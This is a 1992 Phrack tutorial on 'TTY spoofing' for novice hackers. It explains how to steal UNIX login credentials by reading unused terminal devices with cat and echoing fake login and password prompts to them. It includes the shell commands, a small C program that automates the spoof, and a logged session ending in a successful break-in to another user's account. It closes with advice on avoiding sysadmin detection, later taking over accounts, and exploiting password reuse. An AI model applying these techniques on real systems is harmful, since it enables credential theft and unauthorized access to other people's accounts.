468 lines
18 KiB
Text
468 lines
18 KiB
Text
|
==Phrack Inc.==
|
||
|
|
||
|
Volume Four, Issue Forty-One, File 8 of 13
|
||
|
|
||
|
++++++++++++++++++++++++++++
|
||
|
+++++++ +++++++
|
||
|
+++++++ TTY SPOOFING +++++++
|
||
|
+++++++ +++++++
|
||
|
++++++ BY ++++++
|
||
|
+++++ +++++
|
||
|
+++ VaxBuster +++
|
||
|
++ ++
|
||
|
++++++++++++++++++++++++++++
|
||
|
|
||
|
July 16, 1992
|
||
|
|
||
|
|
||
|
Please note that this file is ONLY to be distributed as part of Phrack,
|
||
|
and will NOT be distributed to any other person or magazine for release.
|
||
|
|
||
|
More detailed instructions have been provided so that the novice hacker is
|
||
|
able to understand them; therefore, all experienced hackers should be able to
|
||
|
breeze right through this without having to worry about the specific command
|
||
|
syntax provided.
|
||
|
|
||
|
On UNIX systems, there are many ways to obtain account names and
|
||
|
passwords. Some hackers prefer to swipe the password file and run programs
|
||
|
like Crack and Killer Cracker on them in order to get account names and
|
||
|
passwords. Others rely on bugs or holes in the system in order to gain root
|
||
|
access. Both these methods work, but what do you do if your password file is
|
||
|
shadowed (and it is NOT a yellow pages file!)? And what do you do if all the
|
||
|
holes have been patched over from years of previous hackers abusing them? Well,
|
||
|
I happen to have found a system where all this is true. I have even allowed
|
||
|
hackers to use one of my accounts to try to gain root privs, and of the 10 or
|
||
|
so that have tried, they have all failed. My only recourse was to find SOME
|
||
|
other way to get accounts on the system to maintain MY security.
|
||
|
|
||
|
TTY spoofing is often looked at as being lame, and some don't even
|
||
|
consider it a "hacking technique." People usually completely overlook it, and
|
||
|
many others don't even know about it, or know HOW to do it. I suppose I should
|
||
|
start out by defining the term. TTY spoofing is either installing a Trojan
|
||
|
horse type program to sit and watch a certain (or multiple) tty and wait for a
|
||
|
user to login. Instead of getting the normal system prompt, the program YOU
|
||
|
installed echoes the standard "login:" prompt, and then after they type in
|
||
|
their username, it prompts them for "<username> password:" and boom, you have a
|
||
|
new account. This can be done by a program or, in many cases, manually.
|
||
|
|
||
|
Of all the people I know, 90 percent of them scream at me saying that this
|
||
|
is impossible because their system doesn't allow read/write access to the tty.
|
||
|
When I make references to tty, I mean the physical device filename or
|
||
|
/dev/ttyxx where xx is either numeric, alphabetic, or alphanumeric characters
|
||
|
(e.g., 03, pa, p4 are all valid). Of all the systems I've been on, I've never
|
||
|
seen one that doesn't allow reading/writing to a LOGIN process. See, the
|
||
|
system doesn't change the tty to owner r/w ONLY until AFTER HIS USERNAME AND
|
||
|
PASSWORD HAS BEEN VERIFIED. Console, or ttyco, is an exception where the perms
|
||
|
are ALWAYS -rw------.
|
||
|
|
||
|
Now that you know WHAT tty spoofing is and the general idea behind WHY it
|
||
|
works, I'll start to tell you the many ways it can be done.
|
||
|
|
||
|
In order to tty spoof, you MUST have at least ONE valid account on the
|
||
|
system. You can obtain the account via a little social engineering, or you
|
||
|
could try a /who *sitename in the IRC to get nicknames and use their username
|
||
|
and try to hack out the password. Try looking for users in #hottub and other
|
||
|
st00pid channels because they are the ones who would tend to have the easy
|
||
|
passwords. Or use any other method that you can think of to obtain an account.
|
||
|
|
||
|
Once you have an account, the rest is the easy part. Simply create a
|
||
|
script in vi or emacs that redirects input from UNUSED tty's to cat. Since you
|
||
|
are cat's standard output, everything coming FROM the monitored tty will come
|
||
|
to your screen. You probably want to watch about 10 or 15 terminals. An
|
||
|
example script would be:
|
||
|
cat </dev/tty01&
|
||
|
cat </dev/tty02&
|
||
|
cat </dev/ttypa&
|
||
|
cat </dev/ttyp1&
|
||
|
|
||
|
Then you want to just run your script with source. Once a user walks up
|
||
|
to a terminal (or remotely logs in via telnet, etc.), they will try to press
|
||
|
return and attempt to get a login prompt. Many users will also type their
|
||
|
username, thinking that the system is just waiting for it. Make sure you write
|
||
|
down the username. After a while, they will probably start pressing control
|
||
|
characters, like control-d or z or whatever. Here's the problem: when CAT
|
||
|
encounters the ^D, it thinks that it is receiving an EOF in the file and it
|
||
|
thinks its job is done. You'll get something to the effect of:
|
||
|
|
||
|
[2] Exit DONE cat </dev/tty01
|
||
|
|
||
|
or
|
||
|
|
||
|
[2] Exit 1 cat:i/o error cat </dev/tty01
|
||
|
|
||
|
You want to IMMEDIATELY (if not sooner) "recat" that terminal. Once you get
|
||
|
that DONE signal, you now know WHAT terminal is active. You want to then type
|
||
|
something to the effect of 'echo -n "login:" >/dev/tty01&'. The & is important
|
||
|
because if the user decided to switch terminals, echo could lock up and freeze
|
||
|
your control on the account. If after about 10 seconds echo doesn't come back
|
||
|
as:
|
||
|
|
||
|
[5] Exit DONE echo -n login: >/dev/tty01
|
||
|
|
||
|
KILL the process. When you ran the echo command, the shell gave you a
|
||
|
processid. Just type KILL processid. If the done echo line DOES come back,
|
||
|
that means that it was successfully printed on the user's screen. He will then
|
||
|
type in his username. WRITE THIS DOWN. If you are ever in doubt that the word
|
||
|
on your screen is a username, type 'grep word /etc/passwd' and if a line comes
|
||
|
up, you know it's valid. If grep doesn't return anything, still keep it
|
||
|
because it might be a password. Then wait about 2 seconds, and type
|
||
|
'echo -n "<username> password:" >/dev/tty01&' again using the & to prevent
|
||
|
lockage. If that command doesn't come back in about 10 seconds, kill the
|
||
|
process off and you can assume that you lost the user (e.g. he moved to another
|
||
|
terminal). If the done echo line DOES come back, then in about 2 seconds, you
|
||
|
SHOULD see his password come up. If you do, write it down, and boom, you have
|
||
|
a new account.
|
||
|
|
||
|
This may seem like a time consuming process and a lot of work, but
|
||
|
considering that if you have macros with the "cat </dev/tty" command and the
|
||
|
echo -n commands preset, it will be a breeze. Okay - so you say to yourself,
|
||
|
"I'm a lazy shit, and just want passwords to be handed to me on a silver
|
||
|
platter." With a little bit of work, you can do that! Below is a few lines of
|
||
|
C source code that can be used to automate this process. Anyone who knows C
|
||
|
should be able to put something together in no time.
|
||
|
|
||
|
#include <stdio.h>
|
||
|
|
||
|
FILE *fp, *fp2;
|
||
|
char username[10], password[10];
|
||
|
|
||
|
main()
|
||
|
{
|
||
|
fp=fopen("/dev/ttyp1", "r");
|
||
|
fp2=fopen("/dev/ttyp1", "w");
|
||
|
|
||
|
fprintf(fp2, "login:");
|
||
|
fscanf(fp, "%s", &username);
|
||
|
|
||
|
/* Put delay commands in here */
|
||
|
|
||
|
fprintf(fp2, "%s password:", username);
|
||
|
fscanf(fp, "%s", @password);
|
||
|
|
||
|
printf("Your new account info is %s, with password %s.", username,
|
||
|
password);
|
||
|
}
|
||
|
|
||
|
This is a VERY basic setup. One could fairly easily have the program take
|
||
|
arguments from the command line, like a range of tty's, and have the output
|
||
|
sent to a file.
|
||
|
|
||
|
Below is an actual session of manual tty spoofing. The usernames and
|
||
|
passwords HAVE been changed because they will probably be active when you read
|
||
|
this. Some c/r's and l/f's have been cut to save space. Please notice the
|
||
|
time between the startup and getting a new account is only seven minutes.
|
||
|
Using this technique does not limit the hacked passwords to dictionary
|
||
|
derivatives like Crack and other programs.
|
||
|
|
||
|
source mycats ; This file contains cats
|
||
|
; for terminals tty03 - tty10
|
||
|
[1] 29377
|
||
|
/dev/tty03: Permission denied ; All this means is that someone is logged
|
||
|
in
|
||
|
; and has their mesg set to NO. Ignore it.
|
||
|
|
||
|
[1] Exit 1 cat < /dev/tty03
|
||
|
[2] 29378
|
||
|
[3] 29379
|
||
|
/dev/tty06: Permission denied
|
||
|
/dev/tty05: Permission denied
|
||
|
[4] Exit 1 cat < /dev/tty06
|
||
|
[3] Exit 1 cat < /dev/tty05
|
||
|
/dev/tty07: Permission denied
|
||
|
[3] Exit 1 cat < /dev/tty07
|
||
|
/dev/tty08: Permission denied
|
||
|
[3] Exit 1 cat < /dev/tty08
|
||
|
[2] + Stopped (tty input) cat < /dev/tty04 ;This was the terminal I
|
||
|
was
|
||
|
;on - it's automatically
|
||
|
;aborted...
|
||
|
[3] 29383
|
||
|
<5:34pm><~> /dev/tty09: Permission denied
|
||
|
[3] Exit 1 cat < /dev/tty09
|
||
|
<5:34pm><~> source mycats2 ;This one contains 34 - 43
|
||
|
|
||
|
[3] 29393
|
||
|
[4] 29394
|
||
|
[5] 29395
|
||
|
[6] 29396
|
||
|
[7] 29397
|
||
|
[8] 29398
|
||
|
[9] 29399
|
||
|
/dev/tty36: Permission denied
|
||
|
/dev/tty37: Permission denied
|
||
|
/dev/tty38: Permission denied
|
||
|
/dev/tty39: Permission denied
|
||
|
/dev/tty40: Permission denied
|
||
|
/dev/tty34: Permission denied
|
||
|
/dev/tty35: Permission denied
|
||
|
|
||
|
[9] Exit 1 cat < /dev/tty40
|
||
|
[8] Exit 1 cat < /dev/tty39
|
||
|
[7] Exit 1 cat < /dev/tty38
|
||
|
[6] Exit 1 cat < /dev/tty37
|
||
|
[5] Exit 1 cat < /dev/tty36
|
||
|
[4] Exit 1 cat < /dev/tty35
|
||
|
[3] Exit 1 cat < /dev/tty34
|
||
|
|
||
|
[1] 29400
|
||
|
[3] 29401
|
||
|
[4] 29402
|
||
|
|
||
|
<5:34pm><~> /dev/tty41: Permission denied
|
||
|
|
||
|
[1] Exit 1 cat < /dev/tty41
|
||
|
/dev/tty43: Permission denied
|
||
|
[4] Exit 1 cat < /dev/tty43
|
||
|
/dev/tty42: Permission denied
|
||
|
[3] Exit 1 cat < /dev/tty42
|
||
|
|
||
|
<5:34pm><~> source mycats3 ;This contains p1-pa
|
||
|
|
||
|
[3] 29404
|
||
|
[4] 29405
|
||
|
[5] 29406
|
||
|
[6] 29407
|
||
|
[7] 29408
|
||
|
/dev/ttyp1: Permission denied
|
||
|
/dev/ttyp3: Permission denied
|
||
|
/dev/ttyp5: Permission denied
|
||
|
/dev/ttyp6: Permission denied
|
||
|
|
||
|
[8] Exit 1 cat < /dev/ttyp6
|
||
|
[7] Exit 1 cat < /dev/ttyp5
|
||
|
[5] Exit 1 cat < /dev/ttyp3
|
||
|
[3] Exit 1 cat < /dev/ttyp1
|
||
|
[7] 29410
|
||
|
[8] 29411
|
||
|
[9] 29412
|
||
|
[1] 29413
|
||
|
|
||
|
<5:34pm><~> /dev/ttyp7: Permission denied
|
||
|
|
||
|
[7] Exit 1 cat < /dev/ttyp7
|
||
|
/dev/ttypa: Permission denied
|
||
|
[1] Exit 1 cat < /dev/ttypa
|
||
|
|
||
|
<5:34pm><~> source mycats4 ;Last one is q0-qa
|
||
|
|
||
|
[1] 29426
|
||
|
[3] 29427
|
||
|
[5] 29428
|
||
|
[7] 29429
|
||
|
[10] 29430
|
||
|
[11] 29431
|
||
|
/dev/ttyq5: Permission denied
|
||
|
|
||
|
[10] Exit 1 cat < /dev/ttyq5
|
||
|
[12] 29432
|
||
|
[10] 29433
|
||
|
[13] 29434
|
||
|
[14] 29435
|
||
|
<5:34pm><~> who
|
||
|
|
||
|
<5:34pm><~> nnnnnnnnrlogin unx ; He thought he didn't type it right.
|
||
|
pigsnort ; Important! Write down ALL non-
|
||
|
; system sent messages!
|
||
|
<5:35pm><~>
|
||
|
grep pigsnort /etc/passwd ; Check with grep to see if it's an
|
||
|
; account.
|
||
|
|
||
|
<5:35pm><~> ; Didn't return anything - must be a
|
||
|
; a password!
|
||
|
|
||
|
nnnpptst8 ; Sure looks like an account name to
|
||
|
nnnnn===== ; me! Write it down!
|
||
|
|
||
|
ls
|
||
|
|
||
|
[8] Done cat < /dev/ttyp8 ; Asshole pressed control-d.
|
||
|
; 'recat' the terminal!
|
||
|
|
||
|
<5:36pm><~> cat < /d e v/ ttyp8& ; This is the 'recat.'
|
||
|
|
||
|
[8] 29459
|
||
|
<5:36pm><~> cat: read error: I/O error ; Asshole is now trying all
|
||
|
; sorts of control characters
|
||
|
; sending UNIX into a fit.
|
||
|
[4] Exit 1 cat < /dev/ttyp2
|
||
|
|
||
|
<5:36pm><~> cat </dev/ttyp2& ; 'recat' it!
|
||
|
|
||
|
[4] 29465
|
||
|
<5:36pm><~>
|
||
|
|
||
|
<5:36pm><~>
|
||
|
|
||
|
[6] Done cat < /dev/ttyp4 ; Someone had to press the
|
||
|
; character, so this is active.
|
||
|
|
||
|
<5:36pm><~> cat </dev/ttyp4& ; 'recat' the ctrl-d.
|
||
|
|
||
|
[6] 29468
|
||
|
<5:36pm><~> echo -n "login:" >/dev/ttyble1 ; Try echo'ing a fake login
|
||
|
cat: read error: I/O error ; to the active terminal.
|
||
|
|
||
|
[6] Exit 1 cat < /dev/ttyp4
|
||
|
poop4d ; Here goes another password.
|
||
|
p4 ; Couldn't find the matching
|
||
|
& ; account.
|
||
|
|
||
|
[6] 29470
|
||
|
<5:37pm><~> cat: read error: I/O error
|
||
|
|
||
|
|
||
|
[4] Exit 1 cat < /dev/ttyp2
|
||
|
|
||
|
|
||
|
<5:37pm><~> cat </dev/ttyp2&
|
||
|
|
||
|
[4] 29489
|
||
|
<5:37pm><~> echo -n "login:" >/dev/ttyp2& ; Try echo'ing a fake login
|
||
|
; prompt again.
|
||
|
[15] 29490
|
||
|
<5:37pm><~> kill 29490 ; Login prompt didn't return
|
||
|
; within a few seconds so we
|
||
|
; kill it.
|
||
|
|
||
|
[15] Terminated echo -n login: > /dev/ttyp2
|
||
|
<5:37pm><~> cat </dev/tty
|
||
|
echo -n "login:" >/dev/ttyp4&
|
||
|
|
||
|
[15] 29491
|
||
|
<5:38pm><~> kill 29491
|
||
|
|
||
|
<5:38pm><~> grep pptst8 /etc/passwd ; Make sure it's an account!
|
||
|
|
||
|
pptst8:X:58479:4129:People Eater:/ucuc.edu/usr/pptst8:/bin/bash
|
||
|
<5:38pm><~> grep ble1 /etc/passwd ; This isn't an account...
|
||
|
|
||
|
<5:39pm><~> grep poop4d /etc/passwd ; Neither is this - probably
|
||
|
; a password...
|
||
|
|
||
|
<5:39pm><~> who ; See if any of the users we
|
||
|
; caught fell through an
|
||
|
; 'uncatted' terminal...
|
||
|
|
||
|
<5:39pm><~> ps -x ; View all our processes.
|
||
|
; DAMN glad that the cat's
|
||
|
PID TT STAT TIME COMMAND ; don't come up in the process
|
||
|
29266 04 S 0:04 -tcsh (tcsh) ; list!
|
||
|
29378 04 T 0:00 cat
|
||
|
29412 04 I 0:00 -tcsh (tcsh)
|
||
|
29426 04 I 0:00 -tcsh (tcsh)
|
||
|
29427 04 I 0:00 -tcsh (tcsh)
|
||
|
29428 04 I 0:00 -tcsh (tcsh)
|
||
|
29429 04 I 0:00 -tcsh (tcsh)
|
||
|
29431 04 I 0:00 -tcsh (tcsh)
|
||
|
29432 04 I 0:00 -tcsh (tcsh)
|
||
|
29433 04 I 0:00 -tcsh (tcsh)
|
||
|
29434 04 I 0:00 -tcsh (tcsh)
|
||
|
29435 04 I 0:00 -tcsh (tcsh)
|
||
|
29459 04 I 0:00 -tcsh (tcsh)
|
||
|
29470 04 D 0:00 <exiting>
|
||
|
29489 04 I 0:00 -tcsh (tcsh)
|
||
|
29491 04 D 0:00 -tcsh (tcsh)
|
||
|
29547 04 R 0:00 ps -x
|
||
|
<5:40pm><~> kill 29378 29412 29426 29427 29428 29429 29431 29432 29433 29434 29
|
||
|
|
||
|
435 29459 29470 29489 289491 ;Kill off all processes.
|
||
|
|
||
|
29470: No such process
|
||
|
|
||
|
[4] Terminated cat < /dev/ttyp2
|
||
|
[8] Terminated cat < /dev/ttyp8
|
||
|
[14] Terminated cat < /dev/ttyqa
|
||
|
[13] Terminated cat < /dev/ttyq9
|
||
|
[10] Terminated cat < /dev/ttyq8
|
||
|
[12] Terminated cat < /dev/ttyq7
|
||
|
[11] Terminated cat < /dev/ttyq6
|
||
|
[7] Terminated cat < /dev/ttyq4
|
||
|
[5] Terminated cat < /dev/ttyq3
|
||
|
[3] Terminated cat < /dev/ttyq2
|
||
|
[1] Terminated cat < /dev/ttyq1
|
||
|
[9] Terminated cat < /dev/ttyp9
|
||
|
[2] Terminated cat < /dev/tty04
|
||
|
|
||
|
<5:41pm><~>
|
||
|
|
||
|
[15] Terminated echo -n login: > /dev/ttyp4
|
||
|
[6] Done echo -n login: > /dev/ttyp4
|
||
|
|
||
|
<5:41pm><~> ps -x
|
||
|
|
||
|
PID TT STAT TIME COMMAND
|
||
|
29266 04 S 0:04 -tcsh (tcsh)
|
||
|
29594 04 R 0:00 ps -x
|
||
|
<5:41pm><~> logout
|
||
|
|
||
|
Local -011- Session 1 disconnected from UNIX1
|
||
|
|
||
|
Local> c unx ; Notice it's a different
|
||
|
; system but shares passwords.
|
||
|
Local -010- Session 1 to UNX on node MYUNX established
|
||
|
|
||
|
Welcome to ucuc.edu.
|
||
|
|
||
|
login: ble1 ; Test out all the accounts
|
||
|
ble1 password: [I tried poop4d] ; with all the passwords.
|
||
|
Login failed.
|
||
|
login: pptst8
|
||
|
pptst8 password: [I tried poop4d here too.]
|
||
|
Login failed.
|
||
|
login: pptst8
|
||
|
pptst8 password: [I typed pigsnort]
|
||
|
Authenticated via AFS Kerberos. ; BINGO! We're in!
|
||
|
Checking system rights for <pptst8>... login permitted.
|
||
|
login 1.0(2), Authen
|
||
|
Last login: Fri Jul 17 17:33:30 on tty11
|
||
|
|
||
|
(1) unix $ ls ; Let's see what this sucker
|
||
|
; has...hmm...an IRC user, eh?
|
||
|
Mail Mailbox News bin irc other junk private
|
||
|
public
|
||
|
(2) unix $ logout
|
||
|
|
||
|
Local -011- Session 1 disconnected from UNX
|
||
|
|
||
|
A few words of advice: Monitor the tty's when it's the busiest time of
|
||
|
the day, usually about 11am on a university system. Kill all your processes
|
||
|
before you hang up. Those processes that you run will sit on the system and
|
||
|
can be found by sysadmins. Also, they will tie up those tty's that you are
|
||
|
monitoring, which can also cause problems. Point is, you DON'T want to attract
|
||
|
attention to what you're doing. Don't test the accounts you get immediately.
|
||
|
If the victim happens to be doing a 'who' and sees two of himself, he is going
|
||
|
to shit. Wait until later or use a different subsystem that won't show up on
|
||
|
his 'who'.
|
||
|
|
||
|
Don't take over accounts. All the real user has to do is call up the office
|
||
|
and tell them that their password was changed. In two seconds, it'll be
|
||
|
changed back, plus the sysadmin will be on the lookout so you're just one step
|
||
|
BEHIND where you started. Once you have someone's account info, kill the cat
|
||
|
that is sucking the terminal so that the user can log in normally. If he
|
||
|
continues not to get ANYTHING, he may go and solicit some "professional" help,
|
||
|
and THEY might know what's going on, so let the sucker log in. Another thing:
|
||
|
with accounts you get.
|
||
|
|
||
|
DO NOT DESTROY ANYTHING in the system, not in their account, and no where else
|
||
|
if you get higher privs. Chances are that the person is NOT going to know
|
||
|
someone has obtained their password, and will have NO reason to change it.
|
||
|
Wait until his college term/semester ends and then monitor the file dates. If
|
||
|
after about a month the dates don't change, change the password and do whatever
|
||
|
you want to the account because he's probably done with it.
|
||
|
|
||
|
Oh and one last thing. Once you have a valid account, grep the username and
|
||
|
get the REAL name. Then grep the REAL name and find out all accounts on the
|
||
|
system that the guy owns. Chances are that he is using the same password in
|
||
|
multiple accounts!
|
||
|
|
||
|
Thanks go to Pointman, #hack members, and the entire current/past Phrack staff
|
||
|
for putting out an excellent magazine over the years.
|
||
|
|
||
|
If you need to contact me, try the IRC in #hack and the VMB world. I usually
|
||
|
prefer NOT to be contacted by e-mail, but if you have my address and have an
|
||
|
important question, go for it. I'm willing to help any beginners who need it.
|
||
|
|
||
|
Happy Hacking!
|
||
|
|
||
|
VaxBuster '92
|